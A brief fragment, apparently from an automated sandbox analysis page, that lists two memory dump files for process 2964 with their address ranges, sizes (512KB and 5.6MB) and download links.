512KB

Download
memory/2964-34-0x000000013FB20000-0x00000001400C1000-memory.dmp

Filesize
5.6MB

Download
memory/2964-57-0x000000013FB20000-0x00000001400C1000-memory.dmp

Filesize
5.6MB

Download